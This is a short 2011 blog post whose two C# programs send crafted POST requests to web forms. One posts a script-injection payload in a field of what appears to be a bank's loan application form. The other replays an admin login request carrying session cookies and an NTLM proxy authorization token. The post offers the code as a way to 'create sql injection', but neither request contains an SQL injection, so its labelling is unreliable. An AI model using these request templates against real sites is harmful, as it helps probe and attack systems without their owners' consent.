Friday, June 10, 2011

Create sql injection through POST valiables

Variant 1 (using httpwebrequest)

WebRequest request = WebRequest.Create("http://10.54.40.2/New/cator/_en.php");
            request.Method = "POST";
            string postData = "caazaRata=&email=sample@email.tst&formCNP=&formNume=&formOras=&judet=&perioada4all=&perioadaallin1=&perioadaauto=&perioadacard=&perioadadepozit=&perioadahousing=1%3cScRiPt%20%3eprompt%28944524%29%3c%2fScRiPt%3e&perioadaopen=&perioadatrip=&produsSolicitat=housing1&sel2=%23&submit=Apply%20online&sumaSolicitata=&sursaLead=www.alphabank.ro&telefon=555‐666‐0606&tipFormular=&valutaCreditDorita=EUR&venitCodebitor=94102&venitSolicitant=";
            byte[] byteArray = Encoding.UTF8.GetBytes(postData);
            request.ContentType = "application/x-www-form-urlencoded";
            request.ContentLength = byteArray.Length;

            Stream dataStream = request.GetRequestStream();
            dataStream.Write(byteArray, 0, byteArray.Length);
            dataStream.Close();
            WebResponse response = request.GetResponse();
            Console.WriteLine(((HttpWebResponse)response).StatusDescription);
            dataStream = response.GetResponseStream();
            StreamReader reader = new StreamReader(dataStream);
            string responseFromServer = reader.ReadToEnd();
            Console.WriteLine(responseFromServer);
            reader.Close();
            dataStream.Close();
            response.Close();



Variant 2 (using sockets)

using System;
using System.Text;
using System.Net;
using System.Net.Sockets;

namespace sqlInjection
{
    class Program
    {
        static void Main(string[] args)
        {
            EndPoint ep = new IPEndPoint(Dns.Resolve("www.site.eu").AddressList[0], 80);
            Socket sock = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
            sock.Connect(ep);
            sock.Send(ASCIIEncoding.ASCII.GetBytes(getRequest()), 0, getRequest().Length, SocketFlags.None);
            byte[] data = new byte[10000];
            int recvn = sock.Receive(data, SocketFlags.None);
            sock.Disconnect(false);
            string response = ASCIIEncoding.ASCII.GetString(data, 0, recvn);
            Console.ReadKey();
        }



        public static string getRequest()
        {


            string request = "POST http://www.site.eu/folder/admin/login.aspx HTTP/1.1\n";
            request += "Host: www.site.eu\n";
            request += "User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\n";
            request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n";
            request += "Accept-Language: en-us,en;q=0.5\n";
            request += "Accept-Encoding: gzip, deflate\n";
            request += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n";
            request += "Keep-Alive: 115\n";
            request += "Proxy-Connection: keep-alive\n";
            request += "Referer: http://www.site.eu/Content/admin/login.aspx\n";
            request += "Cookie: trafic_h=02e52l03442d53c6fa09dfbd0171da9a*1297238801*site.eu*1299572237*1300086189*7; __utma=22993581.1366485220.1297952060.1306749931.1307709074.13; __utmz=22993581.1307709074.13.9.utmcsr=id-utmccn=(referral)|utmcmd=referral|utmcct=/; ASP.NET_SessionId=g4qmn155wzpp1345ejs5r345; __utmb=22993581.3.10.1307709074; __utmc=22993581\n";
            request += "Proxy-Authorization: Negotiate TlRMTVNTUAADAAAAGAAYAIIAAAAYABgAmgAAABIAEgBIAAAAEgASAFoAAAAWABYAbAAAAAAAAACyAAAABYKIogUBKAoAAAAPYQBsAHAAaABhAGIAYQBuAGsAaQBtAGkAcgBvAG4AaQBjAGEASABRAC0ATQBJAFIATwBOAEkAQwBBAK4sYYgfYm2HAAAAAAAAAAAAAAAAAAAAAFxJARrW7WqFfvMxrIO/lS7aTQDP900t0g==";

            request += "Content-Type: application/x-www-form-urlencoded\n";
            request += "Content-Length: 206\n";
            request += "__VIEWSTATE=%2FwEPDwULLTExNTc2NTI3OTlkZOHaEH4pHAccC%2BD8297GzVyUUFRz&__EVENTVALIDATION=%2FwEWBALW1uKwCQKl1bKzCQK1qbSRCwKC3IeGDACVXRoyFUUhBYEfdeF4vyGueYuJ&txtUserName=parola&txtPassword=tdsfsd&btnLogin=Login";


            return request;
        }


    }

}

No comments:

Post a Comment